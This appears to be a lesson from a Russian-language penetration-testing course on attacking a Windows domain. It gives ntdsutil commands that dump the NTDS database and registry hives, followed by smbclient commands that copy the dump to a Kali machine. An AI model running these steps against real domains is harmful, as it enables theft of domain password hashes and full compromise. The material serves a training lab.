Занятие 6 - Базовые атаки и компрометация доменной Windows-инфраструктуры

Часть 1. Базовые атаки на инфраструктуру Windows

Этап 1. Анализ базы NTDS

1.1 Бэкап NTDS

Воспользуемся базовыми средствами Windows для работы с NTDS. Необходимо зайти в командную строку от имени администратора и ввести команды:

ntdsutil activate instance ntds ifm create full C:\temp

Этот набор команд активирует процесс Install From Media, позволяющий сделать копию нашего NTDS с необходимыми ветками реестра.

Эти же команды приведены на скриншоте ниже:


https://i.imgur.com/8z4DLNk.png


После этого в директории C:\temp вы увидите созданые файлы дампа


1.2 Перенос NTDS

Воспользуемся базовыми средствами Kali Linux. С помощью SMB зайдём на сервер Win с Kali:

smbclient '\\\\\\192.168.10.200\\C$' -U PT/Administrator

После чего скопируем файлы на Kali:

recurse ON prompt OFF lcd /home/user mget temp

Эти же команды приведены на скриншоте ниже: